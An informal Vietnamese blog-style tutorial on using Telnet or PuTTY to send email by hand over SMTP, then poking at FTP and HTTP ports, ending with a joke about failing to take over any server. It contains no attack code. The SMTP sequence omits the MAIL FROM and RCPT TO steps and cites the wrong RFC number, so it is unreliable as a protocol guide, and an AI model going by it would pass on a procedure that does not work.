1. Điều đầu tiên là bạn phải thiết lập kết nối từ máy tính của bạn đến máy chủ phục vụ Mail
2. Bạn gõ sẽ gõ vào Telnet mail.domain.ext 25 có đúng không?
3. Và bạn sẽ nhận được như thế này
220 digital Microsoft ESMTP MAIL Service, Version: 6.0.2600.1106 ready at Fri,
7 Jan 2000 02:35:43 +0700
4. Sau đó bạn cần gõ vào
HELO local.domain.name – bạn hãy cứ gõ vào như vậy và cũng đừng bận tâm gì về nó còn nếu có thắc mắc gì cứ hỏi chú bé sẽ trả lời cho. (Để thử nghiệm các bạn cần có hòm thư ở Yahoo với điều kiện là đã buy)
5. Để bắt đầu gửi bức thư đó hệ thống sẽ đưa một lệnh đến DATA
Nếu bạn muốn có chủ đề cho bức thư của bạn thì bạn gõ: Subject:-type subject here- sau đó bấn Enter hai lần (điều này cẩn phải phù hợp với RFC 882)
6. Và bây giờ bạn có thể nhập nội dung của bức thư
7. Để cho máy chủ phục vụ Mail hiểu được bạn đã hoàn thành nội dung của một bức thư thì bạn cần viết riêng một dòng với ký hiệu “.”
8. Khi đó máy chủ phục vụ Mail sẽ đưa cho bạn một thông báo 250 2.0.0 ???????? Message accepted for delivery
9. Đến đây bạn đã hoàn tất công việc gửi thư và hãy đưa ra lệnh Quit để thoát khỏi
10. Sau đó máy chủ phục vụ Mail sẽ đưa ra một thông báo:
221 2.0.0 mail.domain.ext closing connection
Connection closed by foreign host.
Oh kê .. chú bé đã trình bày cách sử dụng putty để làm việc với Mail server rồi vậy còn FTP thì sao nhỉ? liệu có được không?
(FTP là phương thức truyền file và nó được đặt ngầm định ở cổng 21, vậy tại sao ta không thử kết nối tới nó nhỉ)
Để hiểu thêm về FTP và Telnet bạn hãy tìn trên mạng và xem thêm ở trang này http://www.csun.edu/itr/guides/ftp+telnet.html
Phù .. kết quả là bạn cũng nhận thấy sử dụng putty vời FTP cũng vẫn OK có đúng không? vậy tại sao chúng ta không thử đánh liều telnet đến máy chủ phục vụ web nhỉ (HTTP server)
Ok kết quả là ngoài sự mong đợi !!!!!!!!!
Putty còn nhiều điều thú vị nữa mong các bạn hãy tự tìm hiều tiếp, và những ai biết về lập trình thì hãy bớt chút thời gian vào trang này http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html và ngó qua source xem nó viết gì nhé ! :-p
Kết luận: vậy chúng ta nên sử dung putty như một tool vi nó rất tuyệt vừa đơn giản vừa gọn nhẹ, vừa dễ dùng …
Hic hic … chán wé .. ngày xưa đi học thực hành LINUX chẳng chịu học hành gì bây giờ ôm quyển sách gần 1000 bằng tiếng anh đọc mà choáng quá – “Linux: The complete reference” mà vẫn chẳng chiếm được quyền điều khiển của cái server nào .. hic hic..
(Đúng là những gì public và free đúng là free các bạn nhỉ :-p )
